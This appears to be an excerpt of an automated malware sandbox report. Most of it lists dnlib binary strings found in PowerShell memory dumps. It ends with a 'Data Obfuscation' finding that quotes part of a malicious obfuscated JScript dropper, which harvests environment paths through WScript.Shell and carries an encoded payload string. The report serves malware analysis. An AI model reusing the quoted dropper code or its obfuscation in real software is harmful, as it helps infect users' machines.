                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000B.00000002.1476246463.00007FFAAC5C0000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.pdb source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000B.00000002.1476246463.00007FFAAC5C0000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  JScript performs obfuscated calls to suspicious functions
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell"); var topologia = shell.ExpandEnvironmentStrings("%APPDATA%"); var ripiglossa = shell.ExpandEnvironmentStrings("%USERPROFILE%"); var SysTemp = shell.ExpandEnvironmentStrings("%TEMP%"); var irrefutado = shell.ExpandEnvironmentStrings("%WINDIR%"); var jambatuto = shell.ExpandEnvironmentStrings("%USERNAME%"); var teorizar = "C:\\path\\to\\your\\teorizar"; // Defina o diretrio de trabalho var linfotomia = "C:\\path\\to\\your\\linfotomia"; // Defina o diretrio temporrio var magricela = "C:\\path\\to\\your\\minidump"; // Defina o diretrio de minidump // Funo para colocar aspas em uma string function garranchoso(strin) { return '"' + strin + '"'; } // Funo para verificar se uma string precisa de aspas function Needgarranchoso(strin) { return strin.indexOf(' ') !== -1; } // Funo para formatar os argumentos function FormatArguments() { var args = WScript.Arguments; var s = ""; for (var i = 0; i < args.length; i++) { var arg = args(i); if (Needgarranchoso(arg)) { s += " " + garranchoso(arg); } else { s += " " + arg; } } return s; } var podartro = "? ? ? ? ?"; var marrasquino = "=AQKAcCAnAgbAkGAPBgSA0CAnAAWAcCArAQXAMDAsAQMAsFApAQZ? ? ? ? ?AMGAOBQRAIHAlBgRAUGAyBAcAUGATBwbAIEASB? ? ? ? ?QZAYFAkAQXAcEAuBQaAIFAUB? ? ? ? ?wcAsFAoAAIAgCAuAAfAkCAyAQOA0FASBQYAgGADBwWAwCApAQMAIDAxAQXAIFAhBAaAMEAbBwKAIDA1AQXAIFAhBAaAMEAbBwKAQDA4AQXAIFAhBAaAMEAbBAKAACAgAQZAMGABBAbAAFAlBgUA0CAgAAIAYDAzAQXAIFAhBAaAMEAbBALAkCA2AQNA0FASBQYAgGADBwWA? ? ? ? 